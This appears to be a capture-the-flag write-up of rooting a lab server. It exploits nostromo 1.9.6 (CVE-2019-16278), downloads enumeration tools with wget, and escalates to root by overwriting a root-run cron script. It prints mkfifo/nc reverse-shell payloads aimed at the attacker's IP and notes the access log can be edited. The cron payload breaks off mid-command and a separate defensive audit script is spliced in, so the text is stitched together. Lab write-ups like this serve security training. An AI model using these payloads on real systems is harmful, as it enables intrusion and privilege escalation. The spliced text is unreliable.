TAMUctf NETWORK_PENTEST MY_FIRST_BLOG

MY_FIRST_BLOG

Here is a link to my new blog! I read about a bunch of exploits in common server side blog tools so I just decided to make my website static. Hopefully that should keep it secure.

Root owns the flag.

http://172.30.0.2/

my-first-blog.ovpn

We are given the my-first-blog.ovpn file.

I connected to the VPN.

$ sudo openvpn my-first-blog.ovpn

Visiting http://172.30.0.2/ shows the blog.


I checked the open ports with nmap.

$ nmap -sC -sV 172.30.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 06:53 EDT
Nmap scan report for 172.30.0.2
Host is up (0.13s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nostromo 1.9.6
|_http-generator: Hugo 0.54.0
|_http-server-header: nostromo 1.9.6
|_http-title: My first blog!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.48 seconds

The server runs nostromo 1.9.6. The site itself is generated by Hugo, so it really is static; the weak point is the web server that serves it.

That version of nostromo is vulnerable to CVE-2019-16278, a remote code execution bug, and a public exploit exists:

nostromo 1.9.6 - Remote Code Execution - Multiple remote Exploit

My IP address on the VPN is 172.30.0.14.

I started a listener on port 4444 and used the exploit to run a reverse shell on the server:

$ nc -lnvp 4444
$ python cve2019_16278.py 172.30.0.2 80 "mkfifo /tmp/mwodv; nc 172.30.0.14 4444 0</tmp/mwodv | /bin/sh >/tmp/mwodv 2>&1; rm /tmp/mwodv"

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    

I got a shell as the webserver user.

$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [172.30.0.14] from (UNKNOWN) [172.30.0.2] 50206
whoami
webserver

wget is available on the target.

wget 
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.

I served pspy64s and linpeas.sh from my machine with python's http.server and downloaded them into the server's /tmp directory.

GitHub - carlospolop/privilege-escalation-awesome-scripts-suite: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

$ python3 -m http.server
cd /tmp
wget http://172.30.0.14:8000/pspy64s
wget http://172.30.0.14:8000/linpeas.sh
ls
linpeas.sh
nostromo-1.9.6
oncufxq
pspy64s
shell.elf
start.sh
chmod +x pspy64s
chmod +x linpeas.sh

I ran pspy64s to watch for processes started by other users:

2020/03/22 11:21:02 CMD: UID=1000 PID=12542  | /bin/sh 
2020/03/22 11:21:02 CMD: UID=1000 PID=12525  | sed s,:.*,&, 
2020/03/22 11:21:02 CMD: UID=1000 PID=12524  | head -n 70 
2020/03/22 11:21:02 CMD: UID=1000 PID=12523  | awk -F: {if (pre != $1){ print $0; }; pre=$1}                                                                              
2020/03/22 11:21:02 CMD: UID=1000 PID=12522  | grep -Ev 0{20,} 
2020/03/22 11:21:02 CMD: UID=1000 PID=12521  | grep -v \.tif$\|\.tiff$\|\.gif$\|\.jpeg$\|\.jpg\|\.jif$\|\.jfif$\|\.jp2$\|\.jpx$\|\.j2k$\|\.j2c$\|\.fpx$\|\.pcd$\|\.png$\|\.pdf$\|\.flv$\|\.mp4$\|\.mp3$\|\.gifv$\|\.avi$\|\.mov$\|\.mpeg$\|\.wav$\|\.doc$\|\.docx$\|\.xls$\|\.xlsx$                                                                 
2020/03/22 11:21:02 CMD: UID=1000 PID=12520  | grep -v /.git/\|/sources/authors/ 
2020/03/22 11:21:02 CMD: UID=1000 PID=12519  | grep -RIEHo \$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*|[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}|\$H\$[a-zA-Z0-9_/\.]{31}|\$P\$[a-zA-Z0-9_/\.]{31}|\$S\$[a-zA-Z0-9_/\.]{52}|\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}|\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}|\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}|\{SHA\}[0-9a-zA-Z/_=]{10,} /etc /var/backups /tmp /var/tmp /var/www /root /home /mnt                                                                             
2020/03/22 11:21:02 CMD: UID=0    PID=11     | sleep 1000000 
2020/03/22 11:21:02 CMD: UID=1000 PID=10     | nhttpd 
2020/03/22 11:21:02 CMD: UID=0    PID=1      | bash /tmp/start.sh 
2020/03/22 11:22:01 CMD: UID=0    PID=13302  | CRON 
2020/03/22 11:22:01 CMD: UID=0    PID=13303  | /bin/sh -c /usr/bin/healthcheck 
2020/03/22 11:22:01 CMD: UID=0    PID=13304  | /bin/bash /usr/bin/healthcheck 

A cron job running as root (UID 0) executes /usr/bin/healthcheck, which is a bash script.

The script then ran nc -z localhost 80.

Next, I ran linpeas.sh.

linpeas reports a lot of information.

The important part is the list of files to which our user has write permission.

(snip)

[+] Interesting writable Files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files       
/dev/mqueue                                                                          
/dev/mqueue/linpeas.txt
/dev/shm
/run/lock
/sys/firmware
/tmp
/tmp/linpeas.sh
/tmp/pspy64s
/tmp/shell.elf
/usr/bin/healthcheck
/var/nostromo/conf
/var/nostromo/conf/mimes
/var/nostromo/conf/nhttpd.conf
/var/nostromo/conf/nhttpd.conf-dist
/var/nostromo/htdocs
/var/nostromo/htdocs/cgi-bin
/var/nostromo/htdocs/cgi-bin/printenv
/var/nostromo/icons
/var/nostromo/logs
/var/nostromo/logs/access_log
/var/nostromo/logs/nhttpd.pid
/var/tmp

(snip)

/usr/bin/healthcheck is writable by our user, even though root runs it from cron. (/var/nostromo/logs/access_log is writable by the same user too, so the web server's own access log can be edited from this shell.)

If we overwrite healthcheck with a reverse shell and wait for cron to run it as root, we get a root shell:

#!/bin/bash
mkfifo /tmp/mwodv; nc 172.30.0.14 4446 0</tmp/mwodv | /bin/sh >/tmp/mwodv 2>&1; rm /t
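The pspy output and the linpeas writable-file list together describe one misconfiguration: a script that root executes from cron but that an unprivileged user can change. The following audit script is an added example for this writeup, not code from the challenge or from pspy/linpeas. It reads a system-format crontab (the /etc/crontab and /etc/cron.d layout with a USER field), resolves each job's command, and reports jobs whose target file is group- or world-writable or not owned by the job's user. The sample crontab, the scratch directory and the file names healthcheck and backup.sh are constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit a system-format
# crontab (min hour dom mon dow USER command ...) and report every job whose
# target file can be modified by someone other than the job's user. On this
# box that is exactly /usr/bin/healthcheck: run by root from cron, writable
# by the webserver user. Paths, users and crontab lines below are constructed.

# Print "WRITABLE <user> <path>" or "ok <user> <path>" per job; a job user that
# does not exist on this host is reported separately instead of being ignored.
audit_cron_file() {
    awk '$1 !~ /^#/ && NF >= 7 { print $6, $7 }' "$1" | sort -u |
    while read -r user cmd; do
        case $cmd in
            /*) path=$cmd ;;                                         # absolute path
            *)  path=$(command -v "$cmd" 2>/dev/null) || continue ;; # bare name: resolve via PATH
        esac
        [ -e "$path" ] || continue
        if ! id "$user" >/dev/null 2>&1; then
            echo "UNKNOWN-USER $user $path"
            continue
        fi
        # Flag group-writable, world-writable, or not owned by the job's own user
        # (a different owner can chmod the file back to writable at will).
        bad=$(find "$path" -maxdepth 0 \( -perm -g=w -o -perm -o=w -o ! -user "$user" \) -print 2>/dev/null || true)
        if [ -n "$bad" ]; then
            echo "WRITABLE $user $path"
        else
            echo "ok $user $path"
        fi
    done
}

# Constructed sample: a scratch directory with a world-writable healthcheck
# run by root (the target's misconfiguration) next to a correctly protected
# script run by the current user. Echoes the path of the generated crontab.
make_sample() {
    dir=$1
    me=$(id -un)
    printf '#!/bin/bash\nnc -z localhost 80\n' > "$dir/healthcheck"
    chmod 777 "$dir/healthcheck"        # anyone can replace it: the bug
    printf '#!/bin/sh\necho backup\n' > "$dir/backup.sh"
    chmod 755 "$dir/backup.sh"          # owner-only write
    printf '%s\n' \
        '# constructed /etc/crontab-style sample' \
        'SHELL=/bin/sh' \
        "* * * * * root $dir/healthcheck" \
        "0 3 * * * $me $dir/backup.sh --quiet" > "$dir/crontab"
    echo "$dir/crontab"
}

demo_dir=$(mktemp -d)
audit_cron_file "$(make_sample "$demo_dir")"
rm -rf "$demo_dir"
```

On a real host run it as audit_cron_file /etc/crontab and once per file in /etc/cron.d; per-user crontabs (crontab -l) have no USER field and are not covered. The fix for the finding is the one the flag hints at: chown root:root /usr/bin/healthcheck and chmod 755 so that only root can change what root executes. The same reasoning applies to the interpreter and any file the script itself runs.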

I had already uploaded a meterpreter payload (shell.elf), so I used meterpreter's upload command to replace healthcheck with the script above:

meterpreter > upload healthcheck
[*] uploading  : healthcheck -> healthcheck
[*] Uploaded -1.00 B of 97.00 B (-1.03%): healthcheck -> healthcheck
[*] uploaded   : healthcheck -> healthcheck

I listened on port 4446 and got a root shell.

$ nc -lnvp 4446
listening on [any] 4446 ...
connect to [172.30.0.14] from (UNKNOWN) [172.30.0.2] 59984
whoami
root

So I got the flag.

cd 
ls
flag.txt
cat flag.txt
gigem{l1m17_y0ur_p3rm15510n5}
FLAG : gigem{l1m17_y0ur_p3rm15510n5}

Thank you for reading.